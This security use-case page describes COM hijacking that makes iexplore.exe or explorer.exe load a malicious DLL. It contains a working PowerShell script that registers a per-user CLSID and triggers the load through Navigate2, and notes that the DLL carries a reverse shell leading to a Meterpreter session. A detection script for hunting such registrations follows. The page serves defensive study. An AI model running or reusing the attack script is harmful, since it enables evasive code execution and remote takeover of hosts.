
UC0012: Forcing load a malicious DLL via COM Abuse

Summary

ID UC0012
Brief Description Forcing load a malicious DLL via COM Abuse
Author Alex@Cyberok
Creation Date 2023/02/28
Modification Date 2023/02/28
ATT&CK Techniques
Tags
  • Code Execution
  • Defense Evasion
  • Windows
Linked Response Playbooks
Artifacts

Description

It is possible to force iexplore.exe (or explorer.exe) to load a malicious DLL and execute it by registering the DLL as a per-user COM in-process server and then steering a running window of that process to the CLSID. Because the payload runs inside a trusted, already-running process rather than as a new executable, the technique can be used to evade certain defenses.

Attack mapping

ARTIFACT | OBJECT | DESCRIPTION
Attack Prerequisites
Host | Compromised host | A host on which the attacker already has initial access
Operating system executable file | Explorer or IE | The legitimate process (explorer.exe or iexplore.exe) that is made to load the malicious DLL; running the payload inside a trusted process is what provides the evasion
Side Observables
Executable Binary | Malicious DLL | The DLL carrying the payload the attacker wants executed on the compromised host
Windows Registry | Registry | Holds low-level settings for the OS and applications; here a per-user CLSID entry under HKCU\Software\Classes redirects a COM activation to the malicious DLL
COM Object | COM object | A registry record under an arbitrary CLSID whose InProcServer32 value names the DLL that handles calls from COM clients

Attack results

Once the registration is in place, instructing a running iexplore.exe (or explorer.exe) window to navigate to shell:::{CLSID} makes that process load the registered DLL, and the code in the DLL runs inside the trusted process.

RESOURCE | DESCRIPTION
Attack Prerequisites
Initial Access | A compromised host the attacker has reached but on which access has not yet been maintained
Result Consequences
Persistent Access | For example, the attacker can build a reverse shell into the payload DLL to obtain remote access to the host
Evasive Code Execution | Running the payload through a COM activation inside a trusted process lets it bypass detection rules and some means of defense that key on the payload being executed directly

Attack progress

1) Below is PowerShell code that registers a new COM object under an arbitrary CLSID (here 55555555-5555-5555-5555-555555555555) whose in-process server is our malicious DLL at ..\attack\com_dll\reverse_64bit.dll, so that the DLL handles incoming calls from COM clients. The keys are written under HKCU\Software\Classes, which the current user can write to and which COM consults before HKLM, so no elevation is required.

Powershell code
$CLSID = "55555555-5555-5555-5555-555555555555"
# remove any earlier registration of this CLSID so the script can be re-run
Remove-Item -Recurse -Force -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" -ErrorAction SilentlyContinue
# path to the malicious DLL we want iexplore to load and execute
$payload = "C:\Users\aegorov\Desktop\attack\com_dll\reverse_64bit.dll"
# per-user class registration: writable without elevation, consulted before HKLM
New-Item -Path "HKCU:\Software\Classes\CLSID" -ErrorAction SilentlyContinue | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" | Out-Null
# InProcServer32 default value names the DLL that COM loads into the client process
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "(default)" -Value $payload | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "ThreadingModel" -Value "Apartment" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "LoadWithoutCOM" -Value "" | Out-Null
# ShellFolder subkey makes the CLSID look like a shell namespace extension to explorer/iexplore
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "HideOnDesktop" -Value "" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "Attributes" -Value 0xf090013d -PropertyType DWORD | Out-Null
# ShellWindows enumerates the open explorer.exe and iexplore.exe windows; pick a running IE window
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin) | ? {$_.fullname -match 'iexplore'} | Select-Object -First 1
# 2048 = navOpenInNewTab; the shell: URL resolves our CLSID and loads the DLL into iexplore.exe
$shwin.Navigate2("shell:::{$CLSID}", 2048)

2) The new COM object is now visible in the registry under HKCU\Software\Classes\CLSID\{CLSID}:

REG_COM

3) The script then requests the ShellWindows (9BA05972-F6A8-11CF-A442-00A0C90A8F39) COM object, which enumerates the open windows of both explorer.exe and iexplore.exe, meaning that with a handle to that collection we can interface with either process through the methods its windows expose.

Specifically, we are interested in getting the COM object for an iexplore.exe window, because its COM server exposes the Navigate2(...) method. Navigate2 allows us to programmatically instruct iexplore.exe to navigate to a URL.

We ask iexplore to navigate to our newly created CLSID, which points at our DLL, instead of a URL. Note that the pipeline only selects an existing window, so an iexplore.exe instance must already be running: if the filter matches nothing, $shwin is $null and the Navigate2 call fails with no DLL loaded.
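The registration above leaves a distinctive footprint: a CLSID under the user-writable HKCU\Software\Classes hive whose InProcServer32 points at a DLL outside the usual system directories, often with the LoadWithoutCOM marker and a ShellFolder subkey. The following PowerShell is an added hunting example written for this page; it is not part of the original use case or of the PowerThIEf tooling. The function names and the list of "trusted" path prefixes are assumptions chosen for illustration and should be tuned to the environment.

```powershell
# Added example (not from the original page): hunt per-user COM in-process servers
# of the kind planted by this technique, then optionally remove one.
function Get-SuspiciousUserComServer {
    [CmdletBinding()]
    param(
        # Hives to inspect. HKCU is the one this technique abuses because it is
        # writable by the user and is consulted before HKLM during CLSID lookup.
        [string[]]$ClassesRoot = @('HKCU:\Software\Classes\CLSID')
    )

    # Assumption: DLLs under these prefixes are considered expected COM server locations.
    $trustedPrefixes = @(
        $env:SystemRoot,
        ${env:ProgramFiles},
        ${env:ProgramFiles(x86)}
    ) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

    foreach ($root in $ClassesRoot) {
        if (-not (Test-Path $root)) { continue }
        foreach ($clsidKey in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
            $serverKey = Join-Path $clsidKey.PSPath 'InProcServer32'
            if (-not (Test-Path $serverKey)) { continue }

            $server = Get-ItemProperty -Path $serverKey -ErrorAction SilentlyContinue
            $dll = [string]$server.'(default)'
            if ([string]::IsNullOrWhiteSpace($dll)) { continue }
            # Expand %VAR% references so REG_EXPAND_SZ values are compared as real paths
            $dll = [Environment]::ExpandEnvironmentVariables($dll.Trim('"'))

            $inTrusted = $false
            foreach ($prefix in $trustedPrefixes) {
                if ($dll.StartsWith($prefix, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true; break }
            }
            # Markers used by the attack script above
            $loadWithoutCom = $null -ne $server.PSObject.Properties['LoadWithoutCOM']
            $shellFolder    = Test-Path (Join-Path $clsidKey.PSPath 'ShellFolder')

            if (-not $inTrusted -or $loadWithoutCom -or $shellFolder) {
                [pscustomobject]@{
                    CLSID          = $clsidKey.PSChildName
                    Hive           = $root
                    ServerDll      = $dll
                    DllExists      = Test-Path -LiteralPath $dll
                    OutsideTrusted = -not $inTrusted
                    LoadWithoutCOM = $loadWithoutCom
                    ShellFolderKey = $shellFolder
                }
            }
        }
    }
}

# Remove a user-level registration found above (the same Remove-Item the attack
# script uses for its own cleanup). Collect the DLL for analysis before deleting.
function Remove-UserComServer {
    param([Parameter(Mandatory)][string]$Clsid)   # e.g. '{55555555-5555-5555-5555-555555555555}'
    $key = "HKCU:\Software\Classes\CLSID\$Clsid"
    if (Test-Path $key) {
        Remove-Item -Path $key -Recurse -Force
    }
}

Get-SuspiciousUserComServer | Format-Table -AutoSize
```

Run as the user whose profile is suspected (HKCU is per-user). Legitimate per-user COM registrations exist (ClickOnce and some vendor software register under HKCU), so treat a hit as a lead rather than a verdict: confirm by checking the DLL's signature and, where Sysmon is deployed, correlate with registry value-set events on ...\CLSID\{...}\InProcServer32 and with image-load events showing an unsigned DLL from a user-writable path inside iexplore.exe or explorer.exe.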

Possible usage

1) The malicious DLL may carry a reverse shell, so once iexplore.exe loads it we get a Meterpreter session:

METER

Attack diagram

Diagram_1

Attack-flow diagram

Diagram_2

References

COM and the PowerThIEf